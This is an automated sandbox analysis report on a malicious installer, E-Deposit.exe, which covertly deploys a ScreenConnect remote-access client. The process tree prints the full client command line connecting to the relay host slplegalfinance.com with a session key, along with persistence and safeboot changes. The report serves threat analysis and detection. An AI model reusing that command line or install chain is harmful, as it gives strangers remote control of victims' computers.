Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
E-Deposit.exe

Overview

General Information

Sample name:E-Deposit.exe
Analysis ID:1584729
MD5:70d47fa2e078f04400d3d1b236245678
SHA1:987aa3368265fc300b10b4128d8367c3d7a29c6c
SHA256:b0a8d541b650ffff1bb4b3690af389e52b1675212129560dbe33038b1041266b
Tags:ConnectWiseexeuser-CodeOmegaDelta
Infos:

Detection

ScreenConnect Tool
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w10x64
  • E-Deposit.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\E-Deposit.exe" MD5: 70D47FA2E078F04400D3D1B236245678)
    • msiexec.exe (PID: 7340 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 7372 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7420 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7468 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 7560 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7612 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 7648 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv" MD5: 75B21D04C69128A7230A0998086B61AA)
    • ScreenConnect.WindowsClient.exe (PID: 7728 cmdline: "C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User" MD5: 1778204A8C3BC2B8E5E4194EDBAF7135)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
E-Deposit.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Windows\Temp\~DF97765AD7BBEEEF8A.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Windows\Temp\~DF85B4BC076AE408FE.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Temp\~DF86AC890801A3F764.TMPJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          C:\Windows\Installer\inprogressinstallinfo.ipiJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            C:\Config.Msi\59d35d.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Click to see the 5 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        Click to see the 4 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.2.E-Deposit.exe.5c50000.10.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          8.0.ScreenConnect.WindowsClient.exe.6f0000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.2.E-Deposit.exe.5c50000.10.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              8.2.ScreenConnect.WindowsClient.exe.2a7fa10.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                0.0.E-Deposit.exe.b95db0.3.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                                  Click to see the 3 entries

                                  Sigma Signatures

                                  System Summary

                                  barindex
                                  Sigma detected: CurrentVersion Autorun Keys Modification
                                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (484f9eed1d8e13b9) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7372, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-3A73-5AC4396425A8}\(Default)

                                  Suricata Signatures

                                  No Suricata rule has matched

                                  Joe Sandbox Signatures

                                  Click to jump to signature section

                                  Show All Signature Results

                                  AV Detection

                                  barindex
                                  Multi AV Scanner detection for submitted file
                                  Source: E-Deposit.exeReversingLabs: Detection: 26%
                                  Source: E-Deposit.exeVirustotal: Detection: 31%Perma Link
                                  AI detected suspicious sample
                                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.4% probability
                                  Source: C:\Users\user\Desktop\E-Deposit.exeEXE: msiexec.exeJump to behavior

                                  Compliance

                                  barindex
                                  EXE planting / hijacking vulnerabilities found
                                  Source: C:\Users\user\Desktop\E-Deposit.exeEXE: msiexec.exeJump to behavior
                                  Uses 32bit PE files
                                  Source: E-Deposit.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  PE / OLE file has a valid certificate
                                  Source: E-Deposit.exeStatic PE information: certificate valid
                                  Contains modern PE file flags such as dynamic base (ASLR) or NX
                                  Source: E-Deposit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Binary contains paths to debug symbols
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.pdbl|r source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1708388417.0000000000F5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1692192902.0000000004100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 59d35d.rbs.2.dr, MSID57F.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSID590.tmp.2.dr, 59d35c.msi.2.dr, MSID7B3.tmp.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSICCC5.tmp.1.dr, ScreenConnect.ClientSetup.msi.0.dr, 59d35c.msi.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbf source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
                                  Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                                  Networking

                                  barindex
                                  Enables network access during safeboot for specific services
                                  Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficDNS traffic detected: DNS query: slplegalfinance.com
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000216D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3545982496.0000000004E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slplegalfinance.com:443/
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000024CD000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000257D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.0000000002419000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000234E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000021CF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.00000000022A4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000007.00000002.3521515935.000000000261C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://slplegalfinance.com:443/d
                                  Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                  Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/news/
                                  Source: rundll32.exe, 00000004.00000003.1683864703.0000000004103000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: E-Deposit.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Reads the Security eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
